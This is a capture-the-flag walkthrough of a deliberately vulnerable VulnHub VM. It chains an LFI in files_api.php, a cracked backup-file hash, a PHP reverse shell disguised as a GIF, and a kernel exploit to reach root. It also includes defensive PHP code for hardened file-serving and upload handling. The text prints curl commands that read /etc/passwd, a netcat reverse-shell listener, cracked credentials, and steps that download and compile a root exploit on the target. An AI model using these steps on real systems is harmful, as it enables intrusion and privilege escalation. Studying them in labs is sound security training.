Hello readers and welcome to another CTF challenge. This VM was made by Frank Tope, as you'll see on the very home page of the server's website (his resume). Nice touch, if I might add. Anyhow, you can download this VM from vulnhub here. The aim of this lab is to get root and read the congratulatory message written in the flag.
I would rate the difficulty level of this lab as intermediate. Although there were no buffer overflows or unnecessary exploit development, it did make us think a little.
Steps involved:
1. Port scanning and grabbing the IP address.
2. Directory busting port 80.
3. Directory busting port 8011.
4. Discovering an LFI vulnerability.
5. Discovering an HTML backup file.
6. Cracking the password hash.
7. Logging in to /development.
8. Uploading a PHP shell disguised as a GIF file.
9. Bypassing the check and triggering the file to get a netcat shell.
10. Privilege escalation to get the flag.
Alright then, let’s head into the VM all the way in.
The first step, as always, is running netdiscover to grab the VM's IP address. In my case the IP was 192.168.1.103.
Once the IP was found, we ran an aggressive nmap scan to enumerate all the open ports.
What was there to wait for after we saw port 80 open! We headed straight into the browser, and a webpage was displayed that looked like a single-page resume.
After not finding much, we chose to run the directory buster dirb.
robots.txt seemed interesting at first, but it had nothing at all. Another directory was /development.
It looked like a testing site, since it asked for authentication.
After not finding much more information, we then chose to look into port 8011. It looked like a backend to the development directory.
We ran one more dirb scan on this port.
We found an interesting directory called /api and opened it in the browser immediately.
We modified the URL to point at /api/, but only one API seemed to be working, and that was files_api.php.
A message said "no parameter called file passed to me." That gave us the hint that we had to pass a parameter called file.
192.168.1.103:8011/api/files_api.php?file=/etc/passwd
HAHA. They got us: the URL parameter didn't work. But there was still one thing left to try: passing the parameter through curl as a POST request.
curl -X POST -d "file=/etc/passwd" http://192.168.1.103:8011/api/files_api.php
As you can see, LFI is present here!
Now, we tried a few more tricks here and there, but nothing else worked with this LFI.
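The behaviour seen above (any readable path disclosed through a POST parameter, and later on an uploaded "image" containing PHP being executed when requested) is what you get when a script hands user input to include. The following is an added example of how a defender would write such a file-serving endpoint, not the VM's actual files_api.php: it assumes the files to serve live in a "files" directory next to the script, and the directory name and the allowed extensions are our own choices.

```php
<?php
// Added example (not the VM's actual files_api.php): a hardened file-read
// endpoint. It assumes the files to serve live in a "files" directory next to
// this script; the directory name and the allowed extensions are our choices.
declare(strict_types=1);

// The behaviour seen in the walkthrough (any path readable, and an uploaded
// "image" containing PHP executing when requested) matches this pattern:
//     include $_POST['file'];
// include treats the target as code, so the fix is both to confine the path
// and to read the file as data.

function serve_file(string $requested, string $baseDir): ?string
{
    // NUL bytes have no place in a file name; older PHP truncated paths at them.
    if (strpos($requested, "\0") !== false) {
        return null;
    }
    $base   = realpath($baseDir);
    $target = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $target === false) {
        return null; // base directory missing, or target does not exist
    }
    // Confinement: after resolving "../" and symlinks, the target must still be
    // inside the base directory. This is what stops ../../etc/passwd.
    if (strpos($target, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    // Only regular files with an allow-listed extension are served.
    $allowed = ['txt', 'json', 'csv'];
    $ext = strtolower(pathinfo($target, PATHINFO_EXTENSION));
    if (!is_file($target) || !in_array($ext, $allowed, true)) {
        return null;
    }
    return file_get_contents($target); // data, never code
}

if (!isset($_POST['file']) || !is_string($_POST['file'])) {
    http_response_code(400);
    exit('no parameter called file passed to me');
}
$body = serve_file($_POST['file'], __DIR__ . '/files');
if ($body === null) {
    http_response_code(404);
    exit('not found');
}
header('Content-Type: text/plain; charset=utf-8');
echo $body;
```

The two checks do different jobs: realpath plus the prefix comparison keeps the request inside one directory regardless of how the path is spelled, and file_get_contents instead of include means that even a file which does slip through is returned as bytes rather than run as PHP.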
Meanwhile, something else caught our attention: the development server. If you have a development site and a development server, there are likely to be more than one HTML file, or copies of HTML files (backups).
One common such file is index.html.bak.
It was an arrow in the dark, but it hit the bullseye!
We saved it and read it using the cat utility.
It had a password hash!
It took us no time to copy the hash into a text file called hash.txt and run John the Ripper on it.
These turned out to be the credentials for the /development authentication:
frank:frank!!!!
And it opened up like a beautiful treasure!
The message on this page said that the uploader tool was only half completed, so we went to the /uploader directory.
The uploader had a security check that allowed images only (jpg, png, gif), and a size limitation too.
So, here is what we did.
Traverse to the directory containing the PHP reverse shell:
/usr/share/webshells/php/php-reverse-shell.php
Open it with a text editor, add GIF98 in the first line, and save the file as shell.gif.
What this does is trick the uploader into believing the file is a GIF when in reality it is a PHP reverse shell.
So we uploaded shell.gif using the uploader, and the following message was received.
Now, the author said the file was uploaded to his uploads path. Let's get a little perspective here.
Website's name: Frank's website
Uploader's name: Frank uploader
First message on website: I love patterns
It took a while, but we guessed it in the end: the uploads directory would be named after Frank. We tried many permutations of this directory name, like Frankupload, frankUploads, franksuploads etc., but the one that hit was FRANKuploads.
This step was tedious and time consuming, as there was no direct link from anywhere to this directory.
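Two weaknesses made the upload step work: the uploader accepted a file because its first bytes looked like a GIF header, and the stored file sat under the web root in a directory whose name could be guessed from the site's theme. The following is an added example of an uploader written to close both, not Frank's uploader from the VM. It assumes the GD extension is loaded and that the upload directory (/var/uploads here, our choice, not a path from the challenge) is outside the web root.

```php
<?php
// Added example (not Frank's uploader from the VM): image upload validation
// that does not trust a magic-byte prefix. It assumes the GD extension is
// loaded and that $uploadDir is a directory outside the web root, for example
// /var/uploads (our choice, not a path from the challenge).
declare(strict_types=1);

// Returns the stored file name on success, or null when the upload is rejected.
function store_image_upload(array $file, string $uploadDir, int $maxBytes = 1000000): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK || $file['size'] > $maxBytes) {
        return null;
    }
    $tmp = $file['tmp_name'];
    if (!is_uploaded_file($tmp)) {
        return null;
    }
    // Checking the extension or the first bytes is exactly what shell.gif
    // defeated: the file began with a GIF signature and was PHP after that.
    // getimagesize() classifies the header; the imagecreatefrom*() call then
    // has to decode the whole file, which rejects anything that is not a real image.
    $info = @getimagesize($tmp);
    if ($info === false) {
        return null;
    }
    switch ($info[2]) {
        case IMAGETYPE_JPEG: $img = @imagecreatefromjpeg($tmp); $ext = 'jpg'; break;
        case IMAGETYPE_PNG:  $img = @imagecreatefrompng($tmp);  $ext = 'png'; break;
        case IMAGETYPE_GIF:  $img = @imagecreatefromgif($tmp);  $ext = 'gif'; break;
        default:             return null; // any other type, including forged ones
    }
    if ($img === false) {
        return null;
    }
    // Re-encode into a fresh file: only pixel data survives, so trailing or
    // embedded script text is dropped. The name is random (nothing to guess, unlike
    // FRANKuploads) and the directory is outside the web root, so the file is never
    // served or included directly; a separate download script hands it out as data.
    $writers = ['jpg' => 'imagejpeg', 'png' => 'imagepng', 'gif' => 'imagegif'];
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($uploadDir, '/') . '/' . $name;
    $ok = $writers[$ext]($img, $dest);
    imagedestroy($img);
    return $ok ? $name : null;
}

if (isset($_FILES['upload'])) {
    $stored = store_image_upload($_FILES['upload'], '/var/uploads');
    echo $stored === null ? 'rejected' : 'stored as ' . $stored;
}
```

Re-encoding is the part that matters most: whether or not GD manages to decode a forged file, what gets written to disk is a fresh image built from pixel data alone, so the PHP text appended after the GIF signature never reaches the upload directory. Keeping that directory outside the web root and naming files randomly removes the second half of the chain, the guessable path that the LFI was later pointed at.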
Now all that was left was to trigger this file.
We know for a fact that double clicking won't do us any good, so we used curl once again, through the LFI, to get a shell.
We started netcat in a terminal on the side and typed the following curl command:
curl -X POST -d "file=/var/www/development/uploader/FRANKuploads/shell.gif" http://192.168.1.103:8011/api/files_api.php
In the other terminal, we had netcat listening:
nc -lvp 1234
As soon as curl triggered the LFI vulnerability and requested shell.gif, we got a netcat session!
id
python -c 'import pty; pty.spawn("/bin/bash")'
uname -a
After a bit of searching, we found a Linux kernel exploit for version 2.6 and served it from our own machine:
searchsploit 15285
cd Desktop
cp /usr/share/exploitdb/exploits/linux/local/15285.c .
python -m SimpleHTTPServer 80
On the VM shell, we downloaded this exploit, compiled it and ran it to get root:
cd tmp
gcc 15285.c -o 15285
chmod 777 15285
./15285
Voila! We got root!
cd root
ls
cat root.txt